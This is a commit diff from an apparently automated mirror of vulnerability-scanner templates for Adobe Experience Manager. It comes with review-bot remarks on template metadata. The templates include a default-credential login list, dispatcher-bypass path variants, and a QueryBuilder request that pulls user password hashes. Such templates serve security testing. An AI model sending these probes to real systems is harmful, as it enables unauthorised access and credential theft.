20240921
actions-user committed Sep 21, 2024
1 parent 69d7702 commit c815775
Showing 1,778 changed files with 105,601 additions and 436,790 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20240920
20240921
15 changes: 15 additions & 0 deletions poc.txt
Expand Up @@ -406,6 +406,7 @@
./poc/apache/apache-hadoop.yaml
./poc/apache/apache-haus.yaml
./poc/apache/apache-hbase-unauth.yaml
./poc/apache/apache-hertzbeat-default-login.yaml
./poc/apache/apache-http.yaml
./poc/apache/apache-httpd-conf-disclosure.yaml
./poc/apache/apache-httpd-conf-exposure.yml
Expand Down Expand Up @@ -1988,6 +1989,7 @@
./poc/auth/apache-flink-unauth-rce-359.yaml
./poc/auth/apache-flink-unauth-rce.yaml
./poc/auth/apache-hbase-unauth.yaml
./poc/auth/apache-hertzbeat-default-login.yaml
./poc/auth/apache-kylin-unauth-cve-2020-13937.yaml
./poc/auth/apache-kylin-unauth-cve-2020-13937.yml
./poc/auth/apache-nifi-api-unauthorized-access.yaml
Expand Down Expand Up @@ -6748,6 +6750,7 @@
./poc/backup/wpvivid-backuprestore-1756a86887229814cb1d125127366531.yaml
./poc/backup/wpvivid-backuprestore-19a73d6d3724e7282ebdb9f69d22604d.yaml
./poc/backup/wpvivid-backuprestore-209d3c1488f2fcc079d5a97d9d12b9ea.yaml
./poc/backup/wpvivid-backuprestore-213509c934588524ca1078ad32939ba4.yaml
./poc/backup/wpvivid-backuprestore-2e130d4ada04f07519235d645cb6333e.yaml
./poc/backup/wpvivid-backuprestore-3172d694e3441974b19aaa9fe10a7638.yaml
./poc/backup/wpvivid-backuprestore-3eeb6dc162eea6beff3be6abba85ec68.yaml
Expand Down Expand Up @@ -40897,6 +40900,7 @@
./poc/cve/CVE-2024-4409-bd7b37af206b0db99929fc562e902a9e.yaml
./poc/cve/CVE-2024-4409.yaml
./poc/cve/CVE-2024-4410-780bb42ca5b1f29027aeefa8dd4b3d38.yaml
./poc/cve/CVE-2024-4410-9f57beaac59e3f42047927d53bc728b4.yaml
./poc/cve/CVE-2024-4410.yaml
./poc/cve/CVE-2024-4411-6004580db2f1334f8d72709c050d45ba.yaml
./poc/cve/CVE-2024-4411.yaml
Expand Down Expand Up @@ -42647,6 +42651,7 @@
./poc/cve/CVE-2024-7304.yaml
./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
./poc/cve/CVE-2024-7313.yaml
./poc/cve/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml
./poc/cve/CVE-2024-7317.yaml
./poc/cve/CVE-2024-7349-a333876f0ff61593d79b76123a7c37bd.yaml
Expand Down Expand Up @@ -42999,6 +43004,7 @@
./poc/cve/CVE-2024-8665.yaml
./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml
./poc/cve/CVE-2024-8669.yaml
./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml
./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
./poc/cve/CVE-2024-8714.yaml
./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml
Expand All @@ -43024,6 +43030,7 @@
./poc/cve/CVE-2024-8850-0902b81489aa227f3c7bf015ba1bc328.yaml
./poc/cve/CVE-2024-8850.yaml
./poc/cve/CVE-2024-8853-4af00fcf0e5fb8017cf4fcd8671e540c.yaml
./poc/cve/CVE-2024-8853.yaml
./poc/cve/CVE202127562-220331-222408.yaml
./poc/cve/CVE_2023_49442.yaml
./poc/cve/CVE_2023_51467.yaml
Expand Down Expand Up @@ -51022,6 +51029,7 @@
./poc/default/aolynk-br304-default-passwordl.yaml
./poc/default/apache-ambari-default-password.yaml
./poc/default/apache-ambari-default-password.yml
./poc/default/apache-hertzbeat-default-login.yaml
./poc/default/apisix-default-login-490.yaml
./poc/default/apisix-default-login-491.yaml
./poc/default/apisix-default-login-492.yaml
Expand Down Expand Up @@ -71462,6 +71470,7 @@
./poc/other/ds_store-7118.yaml
./poc/other/ds_store-7119.yaml
./poc/other/ds_store.yaml
./poc/other/dse855.yaml
./poc/other/dsgvo-youtube-ab2720de0d52a7fa9590416e9523d9f9.yaml
./poc/other/dsgvo-youtube.yaml
./poc/other/dsidxpress.yaml
Expand Down Expand Up @@ -78559,6 +78568,7 @@
./poc/other/klaviyo.yaml
./poc/other/kleeja.yaml
./poc/other/kloxo-single-server.yaml
./poc/other/klr300n-installer.yaml
./poc/other/klr300n-panel.yaml
./poc/other/kn-fix-your.yaml
./poc/other/knews-0a48a832408c3f273ceb312969a27b11.yaml
Expand Down Expand Up @@ -91975,6 +91985,7 @@
./poc/other/umami.yaml
./poc/other/umbraco-installer.yaml
./poc/other/umbraco-workflow.yaml
./poc/other/umbraco.yaml
./poc/other/unakit-323d31abc6d4119a0d2c31c24f9fc5bf.yaml
./poc/other/unakit.yaml
./poc/other/unaunthenticated-jenkin-10883.yaml
Expand Down Expand Up @@ -103778,6 +103789,7 @@
./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
./poc/sql/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml
./poc/sql/CVE-2024-7302-b9e037a9c7ecf1544ad73a0b3afdbb7d.yaml
./poc/sql/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/sql/CVE-2024-7380-6a19e79de20767dbc62e297886ac1342.yaml
./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml
./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml
Expand Down Expand Up @@ -112425,6 +112437,7 @@
./poc/web/webmodule-ee-panel.yaml
./poc/web/webmodule-ee.yaml
./poc/web/webo-facto-connector-5ae10934efb8ea52876014a3550e9c28.yaml
./poc/web/webo-facto-connector.yaml
./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml
./poc/web/webp-converter-for-media-fafd57d5d620d4b5b7c788994a8d0f33.yaml
./poc/web/webp-converter-for-media.yaml
Expand Down Expand Up @@ -113599,6 +113612,7 @@
./poc/wordpress/mailchimp-for-wp-3be37324efc4f836cfcad65b2f7e7178.yaml
./poc/wordpress/mailchimp-for-wp-446a759dfdab67da958d6e6c4909e9f8.yaml
./poc/wordpress/mailchimp-for-wp-4bb9c04b26a6c4bafa69175d618398cf.yaml
./poc/wordpress/mailchimp-for-wp-5e92f5fc00d315f48718ceff379ad83c.yaml
./poc/wordpress/mailchimp-for-wp-6af702232feff9587cc4ef43433a8de7.yaml
./poc/wordpress/mailchimp-for-wp-87f96db12ff152a4b841caf20ce3f1f9.yaml
./poc/wordpress/mailchimp-for-wp-88ba63d5419f4b1796d657e19efd74d1.yaml
Expand Down Expand Up @@ -120408,6 +120422,7 @@
./poc/wordpress/wpvivid-backuprestore-1756a86887229814cb1d125127366531.yaml
./poc/wordpress/wpvivid-backuprestore-19a73d6d3724e7282ebdb9f69d22604d.yaml
./poc/wordpress/wpvivid-backuprestore-209d3c1488f2fcc079d5a97d9d12b9ea.yaml
./poc/wordpress/wpvivid-backuprestore-213509c934588524ca1078ad32939ba4.yaml
./poc/wordpress/wpvivid-backuprestore-2e130d4ada04f07519235d645cb6333e.yaml
./poc/wordpress/wpvivid-backuprestore-3172d694e3441974b19aaa9fe10a7638.yaml
./poc/wordpress/wpvivid-backuprestore-3eeb6dc162eea6beff3be6abba85ec68.yaml
12 changes: 2 additions & 10 deletions poc/adobe/adobe-media-server.yaml
@@ -1,16 +1,10 @@
id: adobe-media-server

info:
name: Adobe Media Server Login Panel
name: Adobe Media Server
author: dhiyaneshDK
severity: info
description: An Adobe Media Server login panel was detected.
reference:
- https://helpx.adobe.com/support/adobe-media-server.html
classification:
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Adobe Media Server"
reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
tags: panel,adobe

requests:
Expand All @@ -27,5 +21,3 @@ requests:
- type: status
status:
- 200

# Enhanced by mp on 2022/03/20
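Review bot: The `reference:` key appears twice in the first hunk, once as a list holding `https://helpx.adobe.com/support/adobe-media-server.html` and once as a scalar pointing at a Shodan search, and the rendered page has lost the +/- markers, so which form survives is not provable from here; if the scalar is the new side, the file also loses `description:`, the `classification:` block with `cwe-id: CWE-200` and the vendor documentation link in the same change. A detection template should keep at least a one-line description so a finding explains itself in a report, so I would keep `description: An Adobe Media Server login panel was detected.` and the list form of `reference:` with both URLs. The retained `tags: panel,adobe` and `severity: info` are consistent with a panel-detection template either way.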
11 changes: 3 additions & 8 deletions poc/adobe/aem-crx-bypass.yaml
@@ -1,14 +1,11 @@
id: aem-crx-bypass

info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
name: AEM CRX Bypass
severity: critical
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem,adobe
reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem

requests:
- raw:
Expand Down Expand Up @@ -42,5 +39,3 @@ requests:
- type: status
status:
- 200

# Enhanced by mp on 2022/04/22
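Review bot: A `severity: critical` template is left with no `description:` and no `remediation:` if the `name: AEM CRX Bypass` and scalar `reference:` lines are the new side, which the 3-addition / 8-deletion count suggests but the rendered page does not prove. The dropped line `remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."` is the one line an operator triaging this finding actually needs, so I would keep it together with the description sentence about default security configurations. The change to `tags: aem` also drops `adobe`, while other AEM templates in this commit carry `aem,adobe`, so tag-based template selection becomes inconsistent across the set.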
19 changes: 15 additions & 4 deletions poc/adobe/aem-default-get-servlet.yaml
@@ -1,15 +1,26 @@
id: aem-default-get-servlet

info:
author: DhiyaneshDk
name: AEM DefaultGetServlet
author: DhiyaneshDk
severity: low
reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
tags: aem

description: Sensitive information might be exposed via AEM DefaultGetServlet.
reference:
- https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
tags: aem,adobe

requests:
- method: GET
path:
- '{{BaseURL}}/etc'
- '{{BaseURL}}/var'
- '{{BaseURL}}/apps'
- '{{BaseURL}}/home'
- '{{BaseURL}}///etc'
- '{{BaseURL}}///var'
- '{{BaseURL}}///apps'
- '{{BaseURL}}///home'
- '{{BaseURL}}/.json'
- '{{BaseURL}}/.1.json'
- '{{BaseURL}}/....4.2.1....json'
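Review bot: The added path variants (`///etc`, `/.json`, `/.1.json`, `/....4.2.1....json`) carry no explanation, and `description: Sensitive information might be exposed via AEM DefaultGetServlet.` says nothing about why the same four repository roots are requested in several spellings. I would extend the description to say that the alternate forms presumably exist because a filter in front of AEM may reject the plain path while the servlet still resolves the variant, so that a later maintainer does not collapse them as duplicates. More probes per target also raise the false-positive exposure, and the matchers are outside this hunk, so I cannot confirm they were reviewed alongside; worth checking that they still key on repository JSON content rather than a bare status code.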
29 changes: 21 additions & 8 deletions poc/adobe/aem-default-login.yaml
@@ -1,11 +1,18 @@
id: aem-default-login

info:
name: Adobe AEM Default Login
author: random-robbie
severity: critical
severity: high
description: Adobe AEM default login credentials were discovered.
reference:
- https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,default-login,adobe

requests:
- raw:
- |
Expand All @@ -16,31 +23,37 @@ requests:
Referer: {{BaseURL}}/libs/granite/core/content/login.html
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
attack: pitchfork
payloads:
aem_user:
- admin
- grios
- replication-receiver
- vgnadmin

- author
- anonymous
- [email protected]
- [email protected]
aem_pass:
- admin
- password
- replication-receiver
- vgnadmin

- author
- anonymous
- jdoe
- aparker
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: header
condition: and
words:
- login-token
- crx.default
condition: and

# Enhanced by mp on 2022/03/23
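Review bot: The two `aem_user:` entries rendered as `[email protected]` are the forge's e-mail obfuscation rather than the committed text, so those values cannot be reviewed from this page and the file should be checked directly. Because `attack: pitchfork` pairs `aem_user` and `aem_pass` by position, both lists must stay the same length (eight entries each as shown), and the blank lines inside the two sequences are best removed so an entry is not silently dropped from one list in a later edit. In the first hunk, `severity: high` and `cvss-score: 8.3` agree with each other (8.3 is High under CVSS v3), which is the consistency this change should keep.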
4 changes: 2 additions & 2 deletions poc/adobe/aem-detection.yaml
Expand Up @@ -12,7 +12,7 @@ info:
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,favicon,tech,adobe
tags: aem,favicon,tech

requests:
- method: GET
Expand All @@ -25,4 +25,4 @@ requests:
matchers:
- type: dsl
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
36 changes: 3 additions & 33 deletions poc/adobe/aem-gql-servlet.yaml
@@ -1,47 +1,17 @@
id: aem-gql-servlet

info:
author: DhiyaneshDk
name: AEM GQLServlet
author: dhiyaneshDk,prettyboyaaditya
severity: low
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
tags: aem


requests:
- method: GET
path:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
- '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix='

stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
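Review bot: If the 3-addition / 33-deletion count is read as leaving a single `path:` entry, that entry is `/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico`, which differs from the removed entries in both the query (`type:User` rather than `type:base`) and the trailing `&p.ico`, and nothing in `info:` says what the probe is looking for. I would add `description: The GQL search servlet is reachable and answers a query for user nodes, which can reveal account names.` so that `severity: low` can be judged against what the response exposes. The `matchers:` block begins at the end of this hunk and continues outside it, so the response check is not visible here; it should match on the JSON result body rather than on status alone.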
3 changes: 0 additions & 3 deletions poc/adobe/aem-groovyconsole.yaml
@@ -1,12 +1,10 @@
id: aem-groovyconsole

info:
name: AEM Groovy console exposed
author: d3sca
severity: critical
description: Groovy console is exposed.
tags: aem

requests:
- method: GET
path:
Expand All @@ -16,7 +14,6 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36

matchers-condition: and
matchers:
- type: word
9 changes: 4 additions & 5 deletions poc/adobe/aem-hash-querybuilder-161.yaml
@@ -1,29 +1,28 @@
id: aem-hash-querybuilder

info:
author: DhiyaneshDk
name: Query hashed password via QueryBuilder Servlet
severity: medium
reference: https://twitter.com/AEMSecurity/status/1372392101829349376
tags: aem

requests:
- raw:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- '"success":true'
- 'rep:password'
condition: and
